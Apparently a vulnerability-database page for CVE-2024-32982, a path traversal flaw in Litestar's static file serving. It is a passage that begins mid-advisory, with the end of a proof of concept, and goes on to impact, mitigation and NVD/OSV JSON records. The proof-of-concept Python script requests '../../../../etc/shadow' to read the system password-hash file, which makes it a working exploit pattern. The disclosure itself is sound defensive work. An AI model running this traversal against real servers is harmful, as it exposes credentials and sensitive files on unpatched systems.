sanitization:\n\n    ```python\n    import http.client\n\n    def send_request(host, port, path):\n        connection = http.client.HTTPConnection(host, port)\n        connection.request(\"GET\", path)\n        response = connection.getresponse()\n        print(f\"Status: {response.status}\")\n        print(f\"Headers: {response.getheaders()}\")\n        data = response.read()\n        print(f\"Body: {data.decode(\u0027utf-8\u0027)}\")\n        connection.close()\n\n    send_request(\"localhost\", 8000, \"/static/../../../../../../etc/shadow\")\n    ```\n\n   - Execute this script using `python3 exploit.py`. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.\n\n4. **Observe:**\n   - The server should respond with the contents of the `/etc/shadow` file, thereby confirming the path traversal vulnerability.\n   - The output will display the status, headers, and body of the response, which should contain the contents of the sensitive file.\n\n\n## Impact\n\nThis Local File Inclusion vulnerability critically affects all instances of [LiteStar](https://github.com/litestar-org/litestar) where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:\n\n1. **Exposure of Sensitive Information:**\n   - The ability to traverse the file system can lead to the exposure of highly sensitive information. This includes system configuration files, application logs, or scripts containing credentials or cryptographic keys. Such information can provide attackers with deeper insights into the system architecture or facilitate further attacks.\n\n2. **Potential for System Compromise:**\n   - If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a `.env` file might reveal environment variables used for application configurations that include database passwords or API keys.\n\n3. **Credential Leakage:**\n   - Access to files such as `/etc/passwd` or `/etc/shadow` (on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.\n\n4. **Regulatory and Compliance Violations:**\n   - Unauthorized access to personally identifiable information (PII), payment data, or health records could result in breaches of data protection regulations such as GDPR, HIPAA, or PCI DSS. This could not only damage the reputation of the organization but also lead to heavy fines and legal action.\n\n5. **Loss of Trust and Reputation Damage:**\n   - Security incidents, particularly those involving the loss of sensitive data, can significantly damage an organization\u0027s reputation. Customers and partners may lose trust, which can impact the business both immediately and in the long term.\n\n6. **Potential for Further Exploitation:**\n   - The initial read access gained through this vulnerability might be used as a stepping stone for more severe attacks. For example, if application source code is accessed, it could be analyzed for further vulnerabilities that might lead to direct exploitation, such as remote code execution.\n\n\n\nHere\u0027s the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:\n\n\n## Mitigation Suggestion\n\nTo effectively address the Local File Inclusion vulnerability via path traversal identified in the [LiteStar](https://github.com/litestar-org/litestar) application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:\n\n1. **Input Validation and Sanitization:**\n   - Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as `../` which are used in path traversal attacks.\n   - Use regular expressions to validate file paths against a strict pattern that only matches expected and safe input.\n\n2. **Path Normalization:**\n   - Normalize file paths before using them in file operations. Functions such as `os.path.normpath()` in Python can be used to normalize paths. This method resolves redundant separators and up-level references (`../`) to prevent directory traversal.\n   - As a reference, consider the approach taken by the Starlette framework in their static file serving feature, where path validation is performed to ensure the requested path remains within the intended directory. For example, see how Starlette handles this with a security check:\n     ```python\n     if os.path.commonpath([full_path, directory]) != directory:\n         # Don\u0027t allow misbehaving clients to break out of the static files\n         # directory.\n         continue\n     ```\n     This snippet from [Starlette\u0027s implementation](https://github.com/encode/starlette/blob/master/starlette/staticfiles.py#L166) ensures that the constructed file path does not traverse out of the specified directory.\n\n\n## Comments\n**Naming Convention:**\n- From versions 0.X.X through 1.X.X, the package was released under the name \"starlite.\"\n- Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name \"litestar.\"\n\n**Feature Additions and Changes:**\n- Static Files Support: Introduced in version 0.6.0, adding the capability to serve static files directly from the package.\n- Path Validation Update: In version 1.37.0, Starlite modified its approach to validating paths within the static directory. Prior to this version, path validation was managed using the Starlette framework.",
  "id": "GHSA-83pv-qr33-2vcf",
  "modified": "2024-07-08T18:47:28Z",
  "published": "2024-05-06T14:20:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32982"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/commit/a07b79b84d8717bec5ac4d4674c1e4920ba9c813"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/litestar-org/litestar"
    },
    {
      "type": "WEB",
      "url": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Litestar and Starlite vulnerable to Path Traversal"
}

GSD-2024-32982

Vulnerability from gsd - Updated: 2024-04-23 05:02

Details

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Aliases

CVE-2024-32982

JSON

To clipboard

{
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2024-32982"
      ],
      "id": "GSD-2024-32982",
      "modified": "2024-04-23T05:02:10.568862Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2024-32982",
        "STATE": "RESERVED"
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided."
          }
        ]
      }
    }
  }
}

FKIE_CVE-2024-32982

Vulnerability from fkie_nvd - Published: 2024-05-06 15:15 - Updated: 2024-11-21 09:16

Severity ?

8.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70
	security-advisories@github.com	https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b
	security-advisories@github.com	https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Litestar and Starlite is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to 2.8.3, 2.7.2, and 2.6.4, a Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server. The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at `litestar/static_files/base.py`. This vulnerability is fixed in versions 2.8.3, 2.7.2, and 2.6.4."
    },
    {
      "lang": "es",
      "value": "Litestar y Starlite es un framework de interfaz de puerta de enlace de servidor as\u00edncrono (ASGI). Antes de las versiones 2.8.3, 2.7.2 y 2.6.4, se descubri\u00f3 una vulnerabilidad de inclusi\u00f3n de archivos locales (LFI) en el componente de servicio de archivos est\u00e1ticos de LiteStar. Esta vulnerabilidad permite a los atacantes explotar fallas de path traversal, permitiendo el acceso no autorizado a archivos confidenciales fuera de los directorios designados. Dicho acceso puede dar lugar a la divulgaci\u00f3n de informaci\u00f3n confidencial o potencialmente comprometer el servidor. La vulnerabilidad se encuentra en el mecanismo de manejo de rutas de archivos dentro de la funci\u00f3n de servicio de contenido est\u00e1tico, espec\u00edficamente en `litestar/static_files/base.py`. Esta vulnerabilidad se solucion\u00f3 en las versiones 2.8.3, 2.7.2 y 2.6.4."
    }
  ],
  "id": "CVE-2024-32982",
  "lastModified": "2024-11-21T09:16:09.857",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-05-06T15:15:23.330",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/litestar-org/litestar/blob/main/litestar/static_files/base.py#L70"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/litestar-org/litestar/commit/57e706e7effdc182fc9a2af5981bc88afb21851b"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-83pv-qr33-2vcf"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-32982 (GCVE-0-2024-32982)

GHSA-83PV-QR33-2VCF

Summary

Details

Proof of Concept (PoC)

Impact

Mitigation Suggestion

Comments

GSD-2024-32982

FKIE_CVE-2024-32982

Tags

Sightings

Nomenclature